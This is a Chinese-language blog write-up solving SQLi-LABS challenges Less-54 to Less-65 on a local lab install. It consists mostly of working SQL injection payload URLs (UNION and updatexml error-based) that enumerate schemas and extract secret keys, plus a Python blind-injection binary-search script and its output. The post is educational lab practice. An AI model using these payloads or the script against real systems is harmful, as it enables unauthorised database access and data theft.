Sky's blog

SQLi-LABS(Challenges)(Less-54 ~ Less-65)

Word count: 2,861 / Reading time: 14 min
2017/07/23 Share

前言

终于要写最后一部分了,看起来这部分的题目应该比较有意思
大致扫了一下题目树,会限定查询次数,应该做起来比较有挑战性吧~
也是第一次遇到这种会限制查询次数的题目233333

Less-54

一共10次机会:
1.http://localhost/sql/Less-54/?id=1'--+
发现可以闭合引号

2.http://localhost/sql/Less-54/?id=1' order by 3--+
3.http://localhost/sql/Less-54/?id=1' order by 4--+
发现一共3列

4.http://localhost/sql/Less-54/?id=1111' union select 1,2,database()--+
发现数据库名:challenges

5.

1
2
http://localhost/sql/Less-54/?id=1111' union select 1,2,(select group_concat(table_name) 
from information_schema.TABLES where TABLE_SCHEMA='challenges')--+

得到表名:2z2ky7u3h6

6.

1
2
http://localhost/sql/Less-54/?id=1111' union select 1,2,(select group_concat(column_name) 
from information_schema.columns where TABLE_name='2z2ky7u3h6')--+

得到字段名:id,sessid,secret_VT7N,tryy

7.

1
http://localhost/sql/Less-54/?id=1111' union select 1,2,(select group_concat(secret_VT7N) from 2z2ky7u3h6)--+

得到Secret Key:N5AhP68HDC7VeLh522yFDDXh

Less-55

尝试4次

1
2
3
4
5
6
7
http://localhost/sql/Less-55/?id=1' union select 1,2,3 --+

http://localhost/sql/Less-55/?id=1" union select 1,2,3 --+

http://localhost/sql/Less-55/?id=1') union select 1,2,3 --+

http://localhost/sql/Less-55/?id=1") union select 1,2,3 --+

均无回显

第五次:http://localhost/sql/Less-55/?id=1) union select 1,2,3 --+
出现回显,参数周围是括号

后面就是常规套路了:
6.http://localhost/sql/Less-55/?id=1111) union select 1,2,database()--+
发现数据库名:challenges

7.

1
2
http://localhost/sql/Less-55/?id=1111) union select 1,2,(select group_concat(table_name) 
from information_schema.TABLES where TABLE_SCHEMA='challenges')--+

得到表名:wu04ztcpuf

8.

1
2
http://localhost/sql/Less-55/?id=1111) union select 1,2,(select group_concat(column_name) 
from information_schema.columns where TABLE_name='wu04ztcpuf')--+

得到字段名:id,sessid,secret_VT7N,tryy

9.

1
http://localhost/sql/Less-55/?id=1111) union select 1,2,(select group_concat(secret_56PJ) from wu04ztcpuf)--+

得到Secret Key:H1CMQXkyRDycn957TvopveMb

Less-56

先尝试了一下

1
http://localhost/sql/Less-56/?id=1111") union select 1,2,database() --+

没有回显,又尝试了

1
http://localhost/sql/Less-56/?id=1111') union select 1,2,database() --+

得到数据库名:challenges
后面又成常规思路了
3.

1
2
http://localhost/sql/Less-56/?id=1111') union select 1,2,(select group_concat(table_name) 
from information_schema.TABLES where TABLE_SCHEMA='challenges')--+

得到表名:w8wm3uvrh8

4.

1
2
http://localhost/sql/Less-56/?id=1111') union select 1,2,(select group_concat(column_name) 
from information_schema.columns where TABLE_name='w8wm3uvrh8')--+

得到字段名:id,sessid,secret_SRYD,tryy

5.

1
http://localhost/sql/Less-56/?id=1111') union select 1,2,(select group_concat(secret_SRYD) from w8wm3uvrh8)--+

得到Secret Key:7AgbCSl8VERK8iX9fcP3D9t1

Less-57

先尝试了一下

1
http://localhost/sql/Less-57/?id=1111 union select 1,2,database() --+

没有回显,又尝试了

1
http://localhost/sql/Less-57/?id=1111" union select 1,2,database() --+

得到数据库名:challenges
后面又成常规思路了
3.

1
2
http://localhost/sql/Less-57/?id=1111" union select 1,2,(select group_concat(table_name) 
from information_schema.TABLES where TABLE_SCHEMA='challenges')--+

得到表名:iva95whf7f

4.

1
2
http://localhost/sql/Less-57/?id=1111" union select 1,2,(select group_concat(column_name) 
from information_schema.columns where TABLE_name='iva95whf7f')--+

得到字段名:id,sessid,secret_EF5I,tryy

5.

1
http://localhost/sql/Less-57/?id=1111" union select 1,2,(select group_concat(secret_EF5I) from iva95whf7f)--+

得到Secret Key:9zrcgg276FWT91nl0qnaP412

Less-58

第一次尝试:
http://localhost/sql/Less-58/?id=1'
得到回显:
to use near ''1'' LIMIT 0,1' at line 1
看来参数周围是单引号,并且是报错注入
随即第二次尝试:
http://localhost/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
得到数据库名:challenges
后面就是常规套路了:
3.

1
2
http://localhost/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) 
from information_schema.TABLES where TABLE_SCHEMA='challenges'),0x7e),1)--+

得到表名:b392at8va9

4.

1
2
http://localhost/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) 
from information_schema.columns where TABLE_name='b392at8va9'),0x7e),1)--+

得到字段名:id,sessid,secret_Q7PX,tryy

5.

1
2
http://localhost/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select secret_Q7PX 
from b392at8va9),0x7e),1)--+

得到Secret Key:lCEe8mTAp48IQmZV28cnEqdb

Less-59

第一次尝试:
http://localhost/sql/Less-59/?id=1'
得到回显:
to use near '' LIMIT 0,1' at line 1
看来参数周围没有符号,并且是报错注入
随即第二次尝试:
http://localhost/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
得到数据库名:challenges
后面就是常规套路了:
3.

1
2
http://localhost/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) 
from information_schema.TABLES where TABLE_SCHEMA='challenges'),0x7e),1)--+

得到表名:nuok0jyq7p

4.

1
2
http://localhost/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) 
from information_schema.columns where TABLE_name='nuok0jyq7p'),0x7e),1)--+

得到字段名:id,sessid,secret_J6JV,tryy

5.

1
2
http://localhost/sql/Less-59/?id=1 and updatexml(1,concat(0x7e,(select secret_J6JV 
from nuok0jyq7p),0x7e),1)--+

得到Secret Key:L2kpGEPJFsFBthbtIuKP3EkC

Less-60

第一次尝试:
http://localhost/sql/Less-60/?id=1'
发现正常
又尝试:
http://localhost/sql/Less-60/?id=1"
得到报错:
to use near '"1"") LIMIT 0,1' at line 1
看来参数周围是双引号加括号闭合,并且是报错注入
后面就是常规套路了:
3.

1
2
http://localhost/sql/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) 
from information_schema.TABLES where TABLE_SCHEMA='challenges'),0x7e),1)--+

得到表名:abo8uemjke

4.

1
2
http://localhost/sql/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) 
from information_schema.columns where TABLE_name='abo8uemjke'),0x7e),1)--+

得到字段名:id,sessid,secret_XE9D,tryy

5.

1
2
http://localhost/sql/Less-60/?id=1") and updatexml(1,concat(0x7e,(select secret_XE9D 
from abo8uemjke),0x7e),1)--+

得到Secret Key:6LBcSsOMUZ7wGeDKOq10xMNv

Less-61

第一次尝试:
http://localhost/sql/Less-61/?id=1'
得到回显:
to use near ''1'')) LIMIT 0,1' at line 1
看来参数周围是单引号加双括号闭合,并且是报错注入
随即第二次尝试:
http://localhost/sql/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
得到数据库名:challenges
后面就是常规套路了:
3.

1
2
http://localhost/sql/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) 
from information_schema.TABLES where TABLE_SCHEMA='challenges'),0x7e),1)--+

得到表名:jw06puceok

4.

1
2
http://localhost/sql/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) 
from information_schema.columns where TABLE_name='jw06puceok'),0x7e),1)--+

得到字段名:id,sessid,secret_C2IB,tryy

5.

1
2
http://localhost/sql/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select secret_C2IB 
from jw06puceok),0x7e),1)--+

得到Secret Key:h5jg06c70zgD1EzDtm8ny6FE

Less-62

看到130次就想到是盲注……
这里的次数显然无法让你用一般的盲注脚本去跑
明显是二分法……对脚本的质量要求较高
而据我观察……这里应该Less-62 ~ Less-65的差别就在于参数的闭合方式不同……
所以下面的题目我就不一一详细写了

先在内心盘算一下已知信息:
数据库名:challenges已知
表名:未知(长度:10)
字段名:secret_未知(长度:4)
Secret Key:未知(长度:24)

也就是说我们的130次,要用来猜38个未知字符,可以说基本上一次不能浪费,因为每个字符平均就3次左右的机会

个人认为不太现实……二分法要在33~127里确定一个数……3次怎么可能够?
打个比方:
比如45
第一次试80(大了)
第二次试56(大了)
第三次试44(小了)
第四次试50(大了)
第五次试47(大了)
差不多5次才能勉勉强强得到结果……这样去猜38个字符……肯定不够啊233333

后来又想到……这里只有数字和字符串,所以缩小33~127这个范围到:48~57,65~90,97~122
为了方便,把他们都放入一个数组,勉勉强强写了个脚本,但是我依旧没办法把查询次数控制在130以内…………

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# Author:sky
# -*- coding: utf-8 -*-
import requests
dic = []
for need_number in range(48,58):
dic.append(chr(need_number))
for need_number in range(65,91):
dic.append(chr(need_number))
for need_number in range(97,123):
dic.append(chr(need_number))
global search_attempts
search_attempts = 0
payload1 = "http://localhost/sql/Less-62/index.php?id=1') and ascii(substr((select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges'),%s,1))>%d--+"
payload2 = "http://localhost/sql/Less-62/index.php?id=1') and ascii(substr((select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges'),%s,1))<%d--+"
payload3 = "http://localhost/sql/Less-62/index.php?id=1') and ascii(substr((select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges'),%s,1))=%d--+"
def TableSearch(n):
global search_attempts
min = 0
max = len(dic) - 1
flag = 1
while(flag):
center = int((min + max) / 2)
k = ord(str(dic[center]))
url1 = payload1%(n,k)
url2 = payload2%(n,k)
url3 = payload3%(n,k)
if "Your Login name" in requests.post(url=url1).content:
search_attempts += 1
min = center + 1
# 有回显,说明我们要的值的ascii大,所以在右边
elif "Your Login name" in requests.post(url=url2).content:
search_attempts += 1
max = center - 1
# 否则,说明我们要的值的ascii小,所以在左边
elif "Your Login name" in requests.post(url=url3).content:
search_attempts += 1
flag = 0
return k
flag_table = ""
for i in range(1,11):
flag_number = TableSearch(i)
flag_table += chr(flag_number)

payload_col1 = "http://localhost/sql/Less-62/index.php?id=1') and ascii(substr((select column_name from information_schema.columns where TABLE_name='"+flag_table+"' limit 2,1),%s,1))>%d--+"
payload_col2 = "http://localhost/sql/Less-62/index.php?id=1') and ascii(substr((select column_name from information_schema.columns where TABLE_name='"+flag_table+"' limit 2,1),%s,1))<%d--+"
payload_col3 = "http://localhost/sql/Less-62/index.php?id=1') and ascii(substr((select column_name from information_schema.columns where TABLE_name='"+flag_table+"' limit 2,1),%s,1))=%d--+"
def ColumnSearch(n):
global search_attempts
min = 0
max = len(dic) - 1
flag = 1
while(flag):
center = int((min + max) / 2)
k = ord(str(dic[center]))
url1 = payload_col1%(n,k)
url2 = payload_col2%(n,k)
url3 = payload_col3%(n,k)
if "Your Login name" in requests.post(url=url1).content:
search_attempts += 1
min = center + 1
# 有回显,说明我们要的值的ascii大,所以在右边
elif "Your Login name" in requests.post(url=url2).content:
search_attempts += 1
max = center - 1
# 否则,说明我们要的值的ascii小,所以在左边
elif "Your Login name" in requests.post(url=url3).content:
search_attempts += 1
flag = 0
return k
flag_column = ""
for i in range(8,12):
flag_number = ColumnSearch(i)
flag_column += chr(flag_number)
flag_column = "secret_"+flag_column

payload_data1 = "http://localhost/sql/Less-62/index.php?id=1') and ascii(substr((select "+flag_column+" from "+flag_table+"),%s,1))>%d--+"
payload_data2 = "http://localhost/sql/Less-62/index.php?id=1') and ascii(substr((select "+flag_column+" from "+flag_table+"),%s,1))<%d--+"
payload_data3 = "http://localhost/sql/Less-62/index.php?id=1') and ascii(substr((select "+flag_column+" from "+flag_table+"),%s,1))=%d--+"
def DataSearch(n):
global search_attempts
min = 0
max = len(dic) - 1
flag = 1
while(flag):
center = int((min + max) / 2)
k = ord(str(dic[center]))
url1 = payload_data1%(n,k)
url2 = payload_data2%(n,k)
url3 = payload_data3%(n,k)
if "Your Login name" in requests.post(url=url1).content:
search_attempts += 1
min = center + 1
# 有回显,说明我们要的值的ascii大,所以在右边
elif "Your Login name" in requests.post(url=url2).content:
search_attempts += 1
max = center - 1
# 否则,说明我们要的值的ascii小,所以在左边
elif "Your Login name" in requests.post(url=url3).content:
search_attempts += 1
flag = 0
return k
flag_data = ""
for i in range(1,25):
flag_number = DataSearch(i)
flag_data += chr(flag_number)
print "表名:"+flag_table,"字段名:"+flag_column,"Secret Key:"+flag_data,"共计查询:"+str(search_attempts)+"次"

测试了几次:

1
2
3
4
表名:nbub3gswin 字段名:secret_VA5S Secret Key:z0a4nKHaAkpZaNSqymsmq3JC 共计查询:194次
表名:392at8va9q 字段名:secret_7PXW Secret Key:CEe8mTAp48IQmZV28cnEqdb8 共计查询:192次
表名:w2xqu18tr8 字段名:secret_WBQV Secret Key:c3HZylgmhHQ674ck67rQzsDN 共计查询:189次
表名:rsa08mddcx 字段名:secret_CQYO Secret Key:gjGChmNisVWaJ7WlaLjhoO0P 共计查询:195次

差不多和我们估算的一样,每个字符大概要查5次左右……总共大概190次马马虎虎可以做出来这题……
等后期技术提高了会改进,看看能不能突破130~

Less-63

还是一道盲注题
同Less-62,只是参数闭合方式不同

Less-64

依旧是盲注题
同Less-62,只是参数闭合方式不同

Less-65

最后一道仍然是盲注题
同Less-62,只是参数闭合方式不同

后记

最后也总算做完了sql注入天书,和我最初做的时候想法不太一样,当时以为会非常难,但后来发现,大部分还是教学性质的题目,并没有几道真正实战的题目,每道题过滤的都不彻底,有多种方法去解题
但是这一波实战下来,也算学到了不少东西,题目很基础,很利于刚学习和打基础~

CATALOG
  1. 1. 前言
  2. 2. Less-54
  3. 3. Less-55
  4. 4. Less-56
  5. 5. Less-57
  6. 6. Less-58
  7. 7. Less-59
  8. 8. Less-60
  9. 9. Less-61
  10. 10. Less-62
  11. 11. Less-63
  12. 12. Less-64
  13. 13. Less-65
  14. 14. 后记